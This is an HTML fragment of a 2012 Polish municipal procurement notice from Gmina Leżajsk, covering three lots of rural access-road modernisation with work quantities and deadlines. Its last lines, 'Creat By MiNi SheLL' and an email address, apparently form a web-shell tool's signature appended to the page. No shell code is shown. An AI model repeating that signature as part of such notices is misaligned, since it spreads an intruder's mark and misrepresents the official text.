<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lezajsk.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Leżajsku
ul. Opalińskiego 2
37-300 Leżajsk
pok.42.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 10:00, miejsce: Urząd Gminy w Leżajsku
ul. Opalińskiego 2
37-300 Leżajsk
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja drogi dojazdowej do gruntów rolnych na obiekcie poscaleniowym, w obrębie Brzóza Królewska  dz. o nr ewid. 1724, 1681.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Inwestycja obejmuje swym zasięgiem teren wsi Brzóza Królewska w Gminie Leżajsk na    
działkach o numerach ewidencyjnych 1724, 1681, długość odcinka planowanego do
modernizacji 750 m szerokość pasa jezdni 4 m poprzez wykonanie:

-  roboty  pomiarowe z wytyczeniem trasy drogi; 0,750 km
-  koryta wykonane na długości 510 m pasem szerokości jezdni 4 m ( 2040 m2)
-  profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni  na długości 
   240 m pasem szerokości 4 m ( 960 m2)
            -  wzmocnienie istniejącej nawierzchni na długości 240 m pasem szerokości 4m (960 m2)
                tłuczniem  kamiennym twardym warstwa 7 cm po zagęszczeniu    
-  wykonanie nawierzchni z tłucznia kamiennego , warstwa dolna po uwałowaniu 10 cm na 
    długości 510 m pasem szerokości 4 m (2040 m2)
-   wykonanie nawierzchni z tłucznia kamiennego , warstwa górna po uwałowaniu 7 cm na 
    długości 510 m pasem szerokości 4 m (2040 m2)
-  ręczne ścinanie i karczowanie  krzaki i poszycia rzadkie  pas rowu   0,06 ha
-  odmulenie rowu na odcinku 600 m , warstwa namułu 40 cm szerokość dna 40 cm.
-  wywóz urobku samochodami samowyładowczymi do 1km 120 m3
-  ścieki z elementów betonowych na podsypce cementowo piaskowej  115 m
-  umocnienie skarp rowu płytami betonowymi 50x 50 x 7 cm    80 m2
-  rozebranie przepustów rurowych betonowych O 30 dł. 6 m  szt. 3 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 0,36 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O40  6 m  szt.1

- rozebranie przepustów rurowych betonowych O 40 dł. 30 m  szt. 5 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 2,4 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O40  30 m  szt.5

- rozebranie przepustów rurowych betonowych O 50 dł. 6 m  szt. 1 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 0,6 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O50  6 m  szt.1
- wykonanie ścianek czołowych do przepustu O50  szt.2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja drogi dojazdowej do gruntów rolnych na obiekcie poscaleniowym, w obrębie Brzóza Królewska  dz. o nr ewid. 3712.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Inwestycja obejmuje swym zasięgiem teren wsi Brzóza Królewska w Gminie Leżajsk na    
działce o numerze ewidencyjnych 3712, długość odcinka planowanego do
modernizacji 735 m szerokość pasa jezdni 4 m poprzez wykonanie:

-  roboty  pomiarowe z wytyczeniem trasy drogi; 0,435 km
-   wykonanie nawierzchni z tłucznia kamiennego , warstwa górna po uwałowaniu 7 cm na 
    długości 435 m pasem szerokości 4 m (1740 m2)
-  roboty  pomiarowe i wytyczeniem trasy drogi; 0,300 km
-  profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni  na długości 
   300 m pasem szerokości 4 m ( 1200 m2)   
-  wykonanie nawierzchni z tłucznia kamiennego , warstwa dolna po uwałowaniu 10 cm na 
    długości 300 m pasem szerokości 4 m (1200 m2)
-   wykonanie nawierzchni z tłucznia kamiennego , warstwa górna po uwałowaniu 7 cm na 
    długości 300 m pasem szerokości 4 m (1200 m2)
-  ręczne ścinanie i karczowanie  krzaki i poszycia rzadkie  pas rowu   0,025 ha
-  odmulenie rowu obustronnie 1320 m , warstwa namułu 30 cm szerokość dna 40 cm.
-  wywóz urobku samochodami samowyładowczymi do 1km 437 m3
-  ścinanie poboczy mechanicznie gr do 10 cm  1470 m2
-  ścieki z elementów betonowych na podsypce cementowo piaskowej  20 m
- umocnienie skarp rowu płytami betonowymi 50x 50 x 7 cm    20 m2
- rozebranie przepustów rurowych betonowych O 40 dł. 30 m  szt. 5 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 2,4 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O40  30 m  szt.5
- rozebranie przepustów rurowych betonowych O 60 dł. 10 m  szt. 1 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 1,2 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O60  10 m  szt.1
- wykonanie ścianek czołowych do przepustu O60  szt.2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizacja drogi dojazdowej do gruntów rolnych na obiekcie poscaleniowym, w obrębie Giedlarowa dz. o nr ewid. 3428, 3440, 3573.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Inwestycja obejmuje swym zasięgiem teren wsi Giedlarowa  w Gminie Leżajsk na     działkach o numerach ewidencyjnych 3428, 3440,3573, długość odcinka planowanego do
modernizacji 535 m szerokość pasa jezdni 4 m poprzez wykonanie:

-  roboty  pomiarowe z wytyczeniem trasy drogi; 0,535 km
-  koryta wykonane na długości 535 m pasem szerokości jezdni 4 m ( 2140 m2)
-  ścieki z elementów betonowych na podsypce cementowo piaskowej  3 m  
-  wykonanie nawierzchni z tłucznia kamiennego , warstwa dolna po uwałowaniu 10 cm na 
    długości 535 m pasem szerokości 4 m (2140 m2)
-   wykonanie nawierzchni z tłucznia kamiennego , warstwa górna po uwałowaniu 7 cm na 
    długości 535 m pasem szerokości 4 m (2140 m2).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com